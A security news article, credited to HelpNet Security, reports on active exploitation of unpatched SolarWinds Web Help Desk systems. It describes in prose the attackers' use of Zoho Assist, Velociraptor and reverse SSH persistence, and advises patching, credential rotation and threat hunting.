Active Attacks Target Unpatched SolarWinds WHD Systems
▼ Summary
– Threat actors are exploiting vulnerable SolarWinds Web Help Desk instances to gain initial access to organizational networks.
– Once inside, attackers deploy legitimate tools like Zoho Assist and Velociraptor for remote access, data collection, and disabling security controls.
– The attackers establish persistent access through methods like a reverse SSH shell and scheduled tasks using a QEMU virtual machine.
– The exact vulnerability being exploited is unclear, but applying the latest SolarWinds WHD patch and rotating credentials is critical.
– These intrusions, observed since at least mid-January, could be for espionage or financial motives, and require a review of systems for unauthorized tools.
Organizations using SolarWinds Web Help Desk software are facing a serious security threat, as attackers actively exploit unpatched systems to infiltrate corporate networks. Security teams from Microsoft and Huntress have issued warnings about these ongoing campaigns, where compromised systems are used to deploy legitimate tools for malicious purposes, creating a stealthy and persistent threat.
The attackers are gaining entry through known vulnerabilities in the SolarWinds WHD platform. The exact vulnerability being leveraged in these recent attacks remains unclear, as the targeted systems were susceptible to multiple known security flaws simultaneously. Once inside, the threat actors avoid using easily detectable malware. Instead, they employ “living-off-the-land” techniques, utilizing software already present or considered legitimate. A key step involves installing a Zoho Assist remote access agent, which provides them with direct, hands-on control of the victim’s machine.
From this position, the attackers scout the network, identifying other computers and user accounts, including those with domain administrator privileges. They then deploy an outdated version of the Velociraptor digital forensics tool. While designed for security investigations, this tool can be weaponized. When connected to an attacker’s server, Velociraptor functions as a powerful command-and-control framework, enabling remote execution, file theft, and disabling of critical security software like Windows Defender and the system firewall.
The infrastructure used in these attacks shows connections to previous malicious campaigns. The attackers’ Velociraptor server is hosted on a Cloudflare Worker account that has been linked to other intrusions, including those involving ToolShell exploits and Warlock ransomware deployments. To ensure they maintain access, the attackers establish multiple persistence mechanisms. This includes creating a reverse SSH tunnel and setting up scheduled tasks that use a QEMU virtual machine to open an SSH backdoor, providing a resilient fallback channel.
These intrusions were first detected in early February, but evidence suggests the activity may have begun in mid-January or even earlier. Huntress observed the exploitation across a small percentage of its customers using SolarWinds WHD. The ultimate goal of these breaches is not yet certain; they could be for cyber espionage or the initial stages of a ransomware attack.
To defend against this threat, immediate action is required. The most critical step is to apply the latest SolarWinds WHD patch, specifically version 2026.1 or newer. Security teams should also rotate all service and admin account credentials accessible from the WHD system and ensure administrative interfaces are not exposed to the public internet. A thorough review of affected hosts is necessary to hunt for signs of compromise, including unauthorized tools like Zoho Assist or Velociraptor, unexpected services, encoded PowerShell scripts, and silent software installations launched by the WHD service process. Both Microsoft and Huntress have published detailed indicators of compromise and hunting rules to assist defenders in identifying this activity within their environments.
(Source: HelpNet Security)
